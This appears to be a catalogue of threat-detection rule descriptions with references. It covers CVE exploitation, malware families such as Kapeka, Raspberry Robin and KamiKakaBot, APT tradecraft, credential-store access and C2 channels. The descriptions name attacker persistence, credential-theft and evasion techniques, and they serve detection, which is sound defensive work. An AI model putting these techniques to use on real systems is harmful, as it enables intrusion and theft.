Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity Detects any creation or modification of a Windows domain group with the name "ESX Admins". This could indicate a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on a domain-joined ESXi hypervisor. VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default. https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/
CVE-2024-49113 Exploitation Attempt - LDAP Nightmare Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll". https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7, https://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/
CVE-2024-50623 Exploitation Attempt - Cleo Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Cleo software suite with a suspicious PowerShell command line. https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
Potential CSharp Streamer RAT Loading .NET Executable Image Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool. https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections, https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/
DarkGate - Drop DarkGate Loader In C:\Temp Directory Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder. https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/, https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html
File Creation Related To RAT Clients Detects the creation of a ".conf" file related to VenomRAT, AsyncRAT and Lummac samples observed in the wild. https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761, https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
Potential KamiKakaBot Activity - Lure Document Execution Detects the execution of a Word document via the WinWord Start Menu shortcut. This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection. https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
Potential KamiKakaBot Activity - Shutdown Schedule Task Creation Detects the creation of a scheduled task that runs weekly and executes the "shutdown /l /f" command. This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system. https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/, https://tria.ge/240123-rapteaahhr/behavioral1
Potential KamiKakaBot Activity - Winlogon Shell Persistence Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence. https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/
Potential Kapeka Decrypted Backdoor Indicator Detects the presence of a file that is the decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges. The file name is typically 5-6 characters long, a random combination of consonants and vowels, followed by a ".wll" extension to pose as a legitimate file and evade detection. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Loaded Via Rundll32.EXE Detects the Kapeka Backdoor binary being loaded by rundll32.exe. The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Persistence Activity Detects Kapeka backdoor persistence activity. Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not). For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM. To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command. Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior
Kapeka Backdoor Execution Via RunDLL32.EXE Detects Kapeka backdoor process execution pattern, where the dropper launches the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Autorun Persistence Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Configuration Persistence Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key. The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence. https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
Kapeka Backdoor Scheduled Task Creation Detects Kapeka backdoor scheduled task creation based on attributes such as paths, command line flags, etc. https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698, https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior
Lummac Stealer Activity - Execution Of More.com And Vbc.exe Detects the execution of more.com and vbc.exe in the process tree. This behavior was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process. https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files, https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef, https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html, https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
Potential Raspberry Robin Aclui Dll SideLoading Detects potential sideloading of malicious "aclui.dll" by OleView. This behavior was observed in Raspberry-Robin variants reported by Check Point Research in February 2024. https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/, https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/, https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/, https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html
Potential Raspberry Robin CPL Execution Activity Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function. This behavior was observed in multiple Raspberry-Robin variants. https://tria.ge/240226-fhbe7sdc39/behavioral1, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/
Potential Raspberry Robin Registry Set Internet Settings ZoneMap Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024. Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections. https://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt, https://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/
DPRK Threat Actor - C2 Communication DNS Indicators Detects DNS queries for C2 domains used by DPRK Threat actors. https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2
Potential APT FIN7 Exploitation Activity Detects potential APT FIN7 exploitation activity as reported by Google. In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to log in to a target server and initiate specific Windows process chains. https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/
Forest Blizzard APT - File Creation Activity Detects the creation of specific files inside of the ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - JavaScript Constrained File Creation Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - Process Creation Activity Detects the execution of specific process and command line combinations. These were seen being created by Forest Blizzard as described by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - Custom Protocol Handler Creation Detects the setting of a custom protocol handler with the name "rogue". Seen being created by Forest Blizzard APT as reported by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
Forest Blizzard APT - Custom Protocol Handler DLL Registry Set Detects the setting of the DLL that handles the custom protocol handler. Seen being created by Forest Blizzard APT as reported by MSFT. https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/
ScreenConnect - SlashAndGrab Exploitation Indicators Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect, as reported by Team Huntress. https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
Account Created And Deleted By Non Approved Users Detects accounts that are created or deleted by non-approved users. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts
Authentication Occurring Outside Normal Business Hours Detects user sign-ins outside of normal business hours. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins
Privilege Role Elevation Not Occurring on SAW or PAW Detects failed sign-in from a PAW or SAW device. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
Privilege Role Sign-In Outside Expected Controls Detects failed sign-in due to user not meeting expected controls for administrators. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
Privilege Role Sign-In Outside Of Normal Hours Detects account sign-ins outside of normal hours or from uncommon locations. Administrator accounts should be investigated. https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
User with Privileges Logon Detects logons with "Special groups" and "Special Privileges", which can be thought of as Administrator groups or privileges. https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964
Potential Zerologon (CVE-2020-1472) Exploitation Detects potential exploitation of the Netlogon Elevation of Privilege vulnerability, aka Zerologon (CVE-2020-1472). https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472, https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/
Potential Pass the Hash Activity Detects the attack technique pass the hash, which is used to move laterally inside the network. https://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events
Remote Registry Management Using Reg Utility Detects remote registry management using the REG utility from a non-admin workstation. https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Interactive Logon to Server Systems Detects interactive console logons to Server Systems Internal Research
DNS Request From Windows Script Host Detects unusual domain resolutions originating from CScript/WScript that can identify malicious JavaScript files executing in an environment, often as a result of a phishing or watering hole attack. Internal Research
New RDP Connection Initiated From Domain Controller Detects an RDP connection originating from a domain controller. Internal Research
Userdomain Variable Enumeration Detects suspicious enumeration of the domain the user is associated with. https://www.arxiv-vanity.com/papers/2008.04676/, https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/
Mail Forwarding/Redirecting Activity In O365 Detects email forwarding or redirecting activity in O365 Audit logs. https://redcanary.com/blog/email-forwarding-rules/, https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf
Python Path Configuration File Creation - Linux Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html
Okta Password Health Report Query Detects all activities against the endpoint "/reports/password-health/*", which should only be accessed via the Okta Admin Console UI. Use this rule to hunt for potential suspicious requests. Correlate this event with "admin console" logins and alert on requests without any corresponding admin console login. https://www.beyondtrust.com/blog/entry/okta-support-unit-breach
Terminate Linux Process Via Kill Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html, https://www.cyberciti.biz/faq/how-force-kill-process-linux/, https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/
Process Discovery Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md, https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/
Python Path Configuration File Creation - MacOS Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html
Clipboard Data Collection Via Pbpaste Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content. https://www.loobins.io/binaries/pbpaste/, https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b, https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF
.Class Extension URI Ending Request Detects requests to URIs ending with the ".class" extension in proxy logs. This rule can be used to hunt for potential downloads of Java classes, as seen for example in Log4Shell exploitation attacks against Log4j. https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/
Firewall Rule Modified In The Windows Firewall Exception List Detects when a rule has been modified in the Windows firewall exception list. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10)
Access To Browser Credential Files By Uncommon Applications - Security Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. This rule requires heavy baselining before usage. https://ipurple.team/2024/09/10/browser-stored-credentials/
Scheduled Task Deletion Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME https://twitter.com/matthewdunwoody/status/1352356685982146562, https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699
Potential Remote WMI ActiveScriptEventConsumers Activity Detects potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network. This event is best correlated and used as an enrichment to determine the potential lateral movement activity. https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
CreateRemoteThread API and LoadLibrary Detects potential use of the CreateRemoteThread API and the LoadLibrary function to inject a DLL into a process. https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html
Remote Thread Creation Via PowerShell Detects the creation of a remote thread from a PowerShell process to another process. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Access To Browser Credential Files By Uncommon Applications Detects file access requests to browser credential stores by uncommon processes. Could indicate a potential attempt at credential stealing. Requires heavy baselining before usage. https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users, https://github.com/lclevy/firepwd
Access To Chromium Browsers Sensitive Files By Uncommon Applications Detects file access requests to chromium based browser sensitive files by uncommon processes. Could indicate potential attempt of stealing sensitive information. Internal Research
Access To Windows Outlook Mail Files By Uncommon Applications Detects file access requests to Windows Outlook Mail files by uncommon processes. Could indicate a potential attempt at credential stealing. Requires heavy baselining before usage. https://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2, https://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows
Access To Sysvol Policies Share By Uncommon Process Detects file access requests to the Windows Sysvol Policies share by uncommon processes. https://github.com/vletoux/pingcastle
Access To .Reg/.Hive Files By Uncommon Applications Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. https://github.com/tccontre/Reg-Restore-Persistence-Mole
Unattend.XML File Access Attempt Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended Windows install process. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
ADS Zone.Identifier Deleted Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/
DMP/HDMP File Creation Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps
Python Path Configuration File Creation - Windows Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html
Scheduled Task Created - FileCreation Detects the creation of a scheduled task via file creation. https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5
Creation of an Executable by an Executable Detects the creation of an executable by another executable. Internal Research
VsCode Code Tunnel Execution File Indicator Detects the creation of a file with the name "code_tunnel.json", which indicates execution and usage of the VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html
WebDAV Temporary Local File Creation Detects the creation of WebDAV temporary files with potentially suspicious extensions https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4
Non-DLL Extension File Renamed With DLL Extension Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions. https://twitter.com/ffforward/status/1481672378639912960, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location
Amsi.DLL Load By Uncommon Process Detects loading of Amsi.dll by uncommon processes. https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9, https://github.com/TheD1rkMtr/AMSI_patch, https://github.com/surya-dev-singh/AmsiBypass-OpenSession
Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process Detects the load of the dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process. The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, the SILENTTRINITY C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL. https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
System Drawing DLL Load Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location Detects the loading of the "taskschd.dll" module from a process that is located in a potentially suspicious or uncommon directory. The loading of this DLL might indicate that the application has the capability to create a scheduled task via the "Schedule.Service" COM object. Investigation of the loading application and its behavior is required to determine if it is malicious. https://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/, https://x.com/Max_Mal_/status/1826179497084739829
Microsoft Excel Add-In Loaded Detects Microsoft Excel loading an Add-In (.xll) file. https://www.mandiant.com/resources/blog/lnk-between-browsers
Microsoft Word Add-In Loaded Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file
WMI Module Loaded By Uncommon Process Detects WMI modules being loaded by an uncommon process. https://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html
Dfsvc.EXE Network Connection To Non-Local IPs Detects network connections to non-local IPs from "dfsvc.exe", a utility used to handle ClickOnce applications. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Dfsvc.EXE Initiated Network Connection Over Uncommon Port Detects an initiated network connection over uncommon ports from "dfsvc.exe", a utility used to handle ClickOnce applications. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
Dllhost.EXE Initiated Network Connection To Non-Local IP Address Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft's own IP range, which needs to be excluded, network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment. https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
HH.EXE Initiated HTTP Network Connection Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files. https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md
Msiexec.EXE Initiated Network Connection Over HTTP Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443. Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages. Use this rule to hunt for potentially anomalous or suspicious communications. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
Network Connection Initiated By PowerShell Process Detects a network connection that was initiated from a PowerShell process. Oftentimes malicious PowerShell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. Use this rule as a basis for hunting for anomalies. https://www.youtube.com/watch?v=DLtJTxMWZ2o
Potentially Suspicious Azure Front Door Connection Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints) https://lots-project.com/site/2a2e617a75726566642e6e6574, https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178, https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting
Network Connection Initiated From Users\Public Folder Detects a network connection initiated from a process located in the "C:\Users\Public" folder. Attackers are known to drop their malicious payloads and malware in this directory as it is writable by everyone. Use this rule to hunt for potentially suspicious or uncommon activity in your environment. https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
PsExec Default Named Pipe Detects PsExec service default pipe creation. https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Uncommon PowerShell Hosts Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe. https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html
bXOR Operator Usage In PowerShell Command Line - PowerShell Classic Detects PowerShell execution that makes use of the bxor (Bitwise XOR) operator. Attackers might use it as an alternative obfuscation method to Base64 encoded commands. Investigate the CommandLine and process tree to determine if the activity is malicious. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_arithmetic_operators?view=powershell-5.1
Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet Detects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host. https://learn.microsoft.com/en-us/powershell/module/netsecurity/get-netfirewallrule?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/powershell/module/netsecurity/show-netfirewallrule?view=windowsserver2022-ps
Compress-Archive Cmdlet Execution Detects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md
Windows Mail App Mailbox Access Via PowerShell Script Detects PowerShell scripts that try to access the default Windows MailApp MailBox. This indicates manipulation of or access to the stored emails of a user. E.g. this could be used by an attacker to exfiltrate or delete the content of the emails. https://github.com/redcanaryco/atomic-red-team/blob/02cb591f75064ffe1e0df9ac3ed5972a2e491c97/atomics/T1070.008/T1070.008.md
New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock Detects when a PowerShell script contains calls to the "New-NetFirewallRule" cmdlet in order to add a new firewall rule with an "Allow" action. https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule, https://malware.news/t/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/72170, https://cybersecuritynews.com/rhysida-ransomware-attacking-windows/
SMB over QUIC Via PowerShell Script Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md, https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps, https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
